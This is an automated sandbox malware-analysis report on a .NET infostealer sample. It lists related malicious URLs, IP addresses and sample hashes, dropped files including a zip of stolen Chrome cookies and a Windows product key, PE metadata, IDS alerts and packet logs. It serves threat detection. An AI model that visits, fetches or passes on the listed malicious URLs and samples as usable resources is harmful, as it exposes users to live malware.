	https://phhqqzqh7ydp8nreby0mq5yfr8su0h93.ocalam.com:8443/impact?impact=shanmugasundaram	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	http://apple.fnf478.com/	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://apple.eph167.com/	Get hash	malicious	Unknown	Browse	199.232.210.172
investdirectinsurance.com	SWIFT.exe	Get hash	malicious	Lokibot	Browse	104.21.65.79
investdirectinsurance.com	SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exe	Get hash	malicious	Lokibot	Browse	104.21.65.79

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	rwsNDpQSKZ.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	CBS_applcation_details_072602024_xlsx.js	Get hash	malicious	WSHRAT	Browse	188.114.96.3
	FpiUD4nYpj.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.2.16
	8SxJ9aYfJ1.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.2.16
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	188.114.96.3
	https://www.kudoboard.com/boards/ZWwsi9jg	Get hash	malicious	Unknown	Browse	172.67.37.149
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
	NsCTgrwBjQ.exe	Get hash	malicious	Unknown	Browse	172.67.177.136
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	34.117.188.166
	8NjcvPNvUr.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	34.117.188.166
	file.exe	Get hash	malicious	Unknown	Browse	34.117.188.166
	file.exe	Get hash	malicious	Unknown	Browse	34.117.188.166
	file.exe	Get hash	malicious	Unknown	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	34.117.188.166
	file.exe	Get hash	malicious	Unknown	Browse	34.117.188.166
	engine.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
	invoker.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
	tgmes.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
OTAVANET-ASCZ	inject.exe	Get hash	malicious	XWorm	Browse	79.110.49.233
	RSPTzXqdcr.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, SugarDump, XWorm	Browse	79.110.49.209
	3C5XR6Oj4g.exe	Get hash	malicious	RedLine	Browse	79.110.49.209
	17173975854cf2f83c89e5b8cb6d3f7fbfb13c91374b38f58a44f4c13da06a8fc0d75eb220903.dat-decoded.exe	Get hash	malicious	XWorm	Browse	79.110.49.133
	3kQyFl1vUy.exe	Get hash	malicious	Socks5Systemz	Browse	79.110.49.184
	file.exe	Get hash	malicious	Socks5Systemz	Browse	79.110.49.184
	SecuriteInfo.com.Win64.PWSX-gen.29898.16595.exe	Get hash	malicious	XWorm	Browse	79.110.49.133
	SecuriteInfo.com.Win64.PWSX-gen.10080.20186.exe	Get hash	malicious	XWorm	Browse	79.110.49.133
	SecuriteInfo.com.Win64.PWSX-gen.7038.2908.exe	Get hash	malicious	XWorm	Browse	79.110.49.133
	SecuriteInfo.com.Win64.PWSX-gen.3439.2109.exe	Get hash	malicious	XWorm	Browse	79.110.49.133

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	34.117.59.81
	FpiUD4nYpj.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	34.117.59.81
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	34.117.59.81
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	34.117.59.81
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	engine.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
	invoker.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
	tgmes.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
	x.ps1	Get hash	malicious	Unknown	Browse	34.117.59.81
37f463bf4616ecd445d4a1937da06e19	CBS_applcation_details_072602024_xlsx.js	Get hash	malicious	WSHRAT	Browse	104.21.65.79
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	104.21.65.79
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	104.21.65.79
	SecuriteInfo.com.FileRepMalware.29184.31872.exe	Get hash	malicious	Unknown	Browse	104.21.65.79
	SecuriteInfo.com.FileRepMalware.29184.31872.exe	Get hash	malicious	Unknown	Browse	104.21.65.79
	PO Tournefortian2453525525235235623425523235.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.65.79
	setup.exe	Get hash	malicious	Amadey	Browse	104.21.65.79
	setup.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	104.21.65.79
	file.exe	Get hash	malicious	Vidar	Browse	104.21.65.79
	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.65.79

Process:	C:\Users\user\Desktop\Ycj3d5NMhc.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.357964438493834
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5:	D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1:	669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256:	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512:	C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1394
Entropy (8bit):	5.333002587247594
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeRE4KYE41LE4DJE4VE4qE4j:MxHKlYHKh3oPtHo6hAHKzeRHKYH1LHDI
MD5:	3AF5ECAD0528A5C6011C879781385DE6
SHA1:	35E81B4735772B3744790C3F35AD8906D602E789
SHA-256:	2FC662335601BABEEAAA73447C92D6F1EE0A1159FC53C77F28683D62353A0C7E
SHA-512:	CBE5AFB09C9C4ADAB43FF358705B8A10942A18A7954733BDBD96BD8DA5811CA1C4C9B90B404EFDF8DF208AEA4CEEEAAE2171AF6998A0BF24E0FA3C96241C8D53
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Web.Extensions, Version=4.0.0.0, Culture=neutra

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Victim_SID[1].bd

Download File

Process:	C:\Users\user\Desktop\Ycj3d5NMhc.exe
File Type:	data
Category:	dropped
Size (bytes):	47616
Entropy (8bit):	7.3984749546983055
Encrypted:	false
SSDEEP:	768:bRinnuikZHazYr+sPVlc1/Sdi0bNxf6lj1rEpBdE4DYywm9Tpfb+pSuGmyZCQrUz:cnpkZHIcs1/rBLDmRBbCqZCQIsPS
MD5:	3E3D6FD0B466B60CA1E91DC596C05DF3
SHA1:	9E09372C4597A6405DF167DFE5C2671F1F62A706
SHA-256:	8F60AA9F4D6672F149B1873CBDB398600A3250019A3CDBB000814C23B92E7C8E
SHA-512:	FA052957886D4998773AFF3329D3154911DA49D8302E8EC617BBCECF32C4B10552001BE57FDCF0A99CFC1139978B23CE7C35827780E789C2CFA9A3E3F2A179A5
Malicious:	false
Reputation:	low
Preview:	..5.)...TLlfs6.LY.L~!L./.L+.Ll.L.#5q9..L.LY....Ll-L..LYiL~uL.kLY L+XOn.L..LY.L~.L..LY.L+.Ll.L.$LY?L~.L.<LYtL+.Ll'L..LYcL~{L.`LY.L+QLl.L..LY.L~.L..LY.L+.Ll.L.LY4L~.L.6LYzL+.Ll)M..LYLL~pL.9....R...";x~LY....1......F`...f.R.+....a..,yc.92ws.................%..F..<Ye2..%@..):.....m:s.<.>.s...je..G..DX...<ks.\X.B.j.\|.).Vg....<$.t......YE..x;X......{...TL+=Ll.L..LYCL~[L.@LY\|.....L.pLY.l..!..GA.L+.:..w3nx.j...L..LYZL+7Ll.L..LY.L~PL.....L+.Y....1....r;.k.LY.L+.h)\L..LY.L~bZN.LYQL+8Ll.L..LY.L~.....U.L+DLl.L.....L~.L..LY..i.LlVL..LY.L~.L....oL+q./.L..LY.L~qk~.LY.L+z~..L.[LY.L~.L..LY.L+.Ll...LY/L~.L.,LYdL+.Ll.L..LY..=kL.LY.L+e.H.L.PLY.L~.L..LY.L+...SL.....VC<L.&LY...Ll.L....L~`L.LY.L+<..L.nLYB...L..LY=L+.LllL..LY..6L.)LYaL+.Ll.L..LY.L~NL.LY.L+.Ll.L.i.U~L~.L.9..7L+.LlfL..LYa.>9L.#LY.......L..LY.L~EL.LY.L+.Ll.L.kLYuL~.L.wLY8L+.LliL..LY.L~3L..LYEM-Ll.L..).L~KL.LY.L+.Ll?L.`LY{L~.L.xLY2L+.LlcL..LY.L~.L..LYJL+'Ll.L.6LY.L~@L.LY.L+.Ll4L.NLYpL~.L.rLY.L+.LlLL..LY.L~.L..LYAL+(Ll.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\Zopi[1].bd

Download File

Process:	C:\Users\user\Desktop\Ycj3d5NMhc.exe
File Type:	data
Category:	dropped
Size (bytes):	549888
Entropy (8bit):	7.500871570223519
Encrypted:	false
SSDEEP:	12288:DnDtmWqrM6THOc2IwYtEyzd8IfhH8dcSLQqutRuojljf8Djc:LIWqg6THOZTqz6AhHmLQXtRZWI
MD5:	52B54991EF7531FC8AFF239E9B513619
SHA1:	269609F0088B2E84A6A9607BA30FBCDDB9C4ADBD
SHA-256:	12F4F28C16FB14C9E9D0807368A68624EF82BB1304458980A2D72C39BF03C9E7
SHA-512:	5014AE36C19761A09040D33CBB5568D6F8352AF6351D31C06AFD65FF5EE4F27265CAF0398410687C09F853D2EC5873EBA494D81DF26B16F9BF589C216FA4764D
Malicious:	false
Reputation:	low
Preview:	..5.)...TLlfs6.LY.L~!L./.L+.Ll.L.#5q9..L.LY....Ll-L..LYiL~uL.kLY L+XOn.L..LY.L~.L..LY.L+.Ll.L.$LY?L~.L.<LYtL+.Ll'L..LYcL~{L.`LY.L+QLl.L..LY.L~.L..LY.L+.Ll.L.LY4L~.L.6LYzL+.Ll)M..LYLL~pL.9....R...";x~LY....1......F`...f.R.+....a..,yc.92ws.................%..F..<Ye2..%@..):.....m:s.<.>.s...je..G..DX...<ks.\X.B.j.\|.).Vg....<$.t......YE..x;X......{...TL+=Ll.L..LYCL~[L.@LY\|.....L.pLY.l..!..GA.L+/...x;;....L..LYZL+7Ll.L..LY.L~PL.....L+.Y..f.1....r;.k.LY.L+..K.Y..LY.L~V\..LYQL+8Ll.L..LY.L~.....$.).DLl.L.....L~.L..LY.L+.LlVL..LY.L~.N..LYoL+q./.L..LY.L~qk~.LY.L+z~..L.[LY.L~.L..LY.L+.Ll..*.LY/L~.L.,LYdL+.Ll.L..LY.O}w&r.LY.L+e.H.L.PLY.L~.L..LY.L+..HSL.....VC<L.&LY...Ll.L....L~`L.LY.L+<..L.nLYB...L..LY=L+.LllL..LY..6L.)LYaL+.Ll.L..LY.L~NL.LY.L+.Ll.\|...$.Z.L..'a7L+.LlfL..LY!L~.&r#LY.......L..LY.L~EL.LY.L+.Ll.L.kLYuL~.L.wLY8L+.LliL..LY.L~3L..LY..j....L..).L~KL.LY..8..-.Y.`LY....L.xLY2L+.LlcL..LY.L~.L..LYJL+'Ll.L.6LY.L~@L.LY.L+.Ll4L.NLYpL~.L.rLY.L+.LlLL..LY.L~.L..LYAL+(Ll.

C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\mzsxeov1.jvf\[user]-[468325].zip

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	598
Entropy (8bit):	6.599323349989143
Encrypted:	false
SSDEEP:	12:5jwXvRUCxwY4tLz6ejmzOcLgtTg7iwCNb+wGTm7IsXqCxDQz6sEt:90qFaeOxgpgePZ+wjIyft
MD5:	91612CB33854C1665206900619930472
SHA1:	3099F2A90AEE76775FB0501AB8D568111AD06119
SHA-256:	4B8BA5E517D9F1A3059AD4979CFD559AA398F6E53D03912C3F0D561C484A268D
SHA-512:	7B3C556C80052EB255CBC0C7E1FF77A4209C3725EE8EF5DEEDF03353EEC89FF8E9266A3D5E3EE54B4E8693E7A5D0B6D1E60F958DC12F8B04594F3E5BB4554D07
Malicious:	false
Reputation:	low
Preview:	PK.........,.Xq..........."...Others\Windows Product Key\key.txt..........2..0....07r..p.....PK.........,.X.&.....4......Chromium\Google Chrome\Default\Cookies.txt...R.0.@.=3..?@M@.a...gB...)....`...^.t...N.d.%m(.....Bj.%=..[....,....SC.).....%)@Qe.d........2......4....d...7=.W...].F>.li......{.....)..0......6...H..\|...#.;m..qv.r.<F...+q..}...(.Kb..-.4...Ki7l.#Y...;6.`...h.l/W..2C..uE..PK...........,.Xq...........".................Others\Windows Product Key\key.txtPK...........,.X.&.....4................_...Chromium\Google Chrome\Default\Cookies.txtPK....................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.5607681406945835
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Ycj3d5NMhc.exe
File size:	294'400 bytes
MD5:	10da3cc4689926de08a0ba47481acead
SHA1:	37d4b0ce7114c0cc427705f35430656bc3d4c049
SHA256:	c269ec6cc10cfa210817133e43becae40004a1ddb2220646cddf8a3165bf4269
SHA512:	9e2e75fa48459e092ab2bf13200762cc9ec3a63603e80b5f208116cade770ef8ed6b0ccbbc65eb77bcc458784b99ffc9a048d587c02615e77261f05c23ef991a
SSDEEP:	3072:wAzp8YhLI6DhT4PrzD8VHCydY+pkzDqVHzYdKwDdomYcQGIKfjlOh0EJZdzmTRzC:7ptZFT4QndzYdKwDdom1fjS0EgJG
TLSH:	89548DA033A4C82AD6DF077650E156947735AD825741EB5E38CE38DC5B9A7030F22BBB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................z..........N.... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x44984e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A2EBB4 [Fri Jul 26 00:20:04 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [0044985Ch]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax+00000004h], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov ah, EBh
mov byte ptr [00000066h], al
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [eax+00h], cl
add byte ptr [eax], al
sbb byte ptr [eax+7A800004h], 00000004h
add byte ptr [edx+53h], dl
inc esp
push ebx
arpl word ptr [eax], bx
push eax
or eax, 9B4FCD60h
jp 00007FE3AC89F933h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x49800	0x4c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x49864	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4985c	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x478c8	0x47a00	37ee2bce863fe073446b90f9ff2d2df7	False	0.46091704842931935	data	6.572244100329562	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x4a000	0xc	0x200	d3b241482c9c44bcd4d22b47e0a1585d	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-27T11:38:15.193643+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49718	13.85.23.86	192.168.2.8
2024-07-27T11:37:37.062108+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49711	13.85.23.86	192.168.2.8
2024-07-27T11:37:20.124935+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	49708	443	192.168.2.8	104.21.65.79
2024-07-27T11:37:19.091900+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	49707	443	192.168.2.8	104.21.65.79

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 11:37:15.456314087 CEST	49673	443	192.168.2.8	23.206.229.226
Jul 27, 2024 11:37:15.737596035 CEST	49672	443	192.168.2.8	23.206.229.226
Jul 27, 2024 11:37:17.791685104 CEST	49676	443	192.168.2.8	52.182.143.211
Jul 27, 2024 11:37:17.960139990 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:17.960165977 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:17.960233927 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:17.964155912 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:17.964164972 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:18.447119951 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:18.447197914 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:18.807472944 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:18.807514906 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:18.807889938 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:18.807943106 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:18.814050913 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:18.856504917 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.091934919 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.092061043 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.092060089 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.092124939 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.092204094 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.092283964 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.092286110 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.092286110 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.092286110 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.092312098 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.092344999 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.092366934 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.092380047 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.092432976 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.092442989 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.092505932 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.092516899 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.092573881 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.092585087 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.092638969 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.092649937 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.092708111 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.093713999 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.093776941 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.174091101 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.174575090 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.182075024 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.182162046 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.182193041 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.182257891 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.182274103 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.182343006 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.182353973 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.182383060 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.182415009 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.182457924 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.182476997 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.182531118 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.182585001 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.182645082 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.182661057 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.182718992 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.183159113 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.183223963 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.183245897 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.183300972 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.183332920 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.183391094 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.183412075 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.183465004 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.184042931 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.184102058 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.184120893 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.184180021 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.184200048 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.184254885 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.184283972 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.184346914 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.184365988 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.184423923 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.184441090 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.184499979 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.185074091 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.185134888 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.185183048 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.185242891 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.185271978 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.185328960 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.185348034 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.185401917 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.185415030 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.185470104 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.257565975 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.257811069 CEST	49707	443	192.168.2.8	104.21.65.79
Jul 27, 2024 11:37:19.257877111 CEST	443	49707	104.21.65.79	192.168.2.8
Jul 27, 2024 11:37:19.257947922 CEST	49707	443	192.168.2.8	104.21.65.79
